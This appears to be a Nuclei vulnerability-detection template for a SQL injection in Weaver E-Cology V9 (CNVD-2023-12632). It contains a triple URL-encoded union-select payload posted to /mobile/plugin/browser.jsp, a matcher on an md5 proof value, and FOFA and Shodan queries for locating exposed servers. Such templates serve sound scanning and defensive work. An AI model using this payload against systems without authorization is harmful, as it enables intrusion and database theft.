44 lines
2.4 KiB
YAML
44 lines
2.4 KiB
YAML
id: CNVD-2023-12632
|
|
|
|
info:
|
|
name: E-Cology V9 - SQL Injection
|
|
author: daffainfo
|
|
severity: high
|
|
description: |
|
|
Ecology9 is a new and efficient collaborative office system created by Panmicro for medium and large organizations. There is a SQL injection vulnerability in Panmicro ecology9, which can be exploited by attackers to obtain sensitive database information.
|
|
reference:
|
|
- https://www.zhihu.com/tardis/zm/art/625931869?source_id=1003
|
|
- https://blog.csdn.net/qq_50854662/article/details/129992329
|
|
metadata:
|
|
max-request: 1
|
|
verified: true
|
|
fofa-query: app="泛微-协同商务系统"
|
|
shodan-query: 'ecology_JSessionid'
|
|
tags: cnvd,cnvd2023,ecology,sqli
|
|
|
|
# a' union select 1,''+(SELECT md5(9999999))+'
|
|
# URL encoded 3 times
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /mobile/plugin/browser.jsp HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
isDis=1&browserTypeId=269&keyword=%25%32%35%25%33%36%25%33%31%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%35%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%36%33%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%38%25%32%35%25%33%35%25%33%33%25%32%35%25%33%34%25%33%35%25%32%35%25%33%34%25%36%33%25%32%35%25%33%34%25%33%35%25%32%35%25%33%34%25%33%33%25%32%35%25%33%35%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%36%34%25%32%35%25%33%36%25%33%34%25%32%35%25%33%33%25%33%35%25%32%35%25%33%32%25%33%38%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%33%25%33%39%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%37
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '283f42764da6dba2522412916b031080'
|
|
- '"autoCount"'
|
|
- '"autoGet"'
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|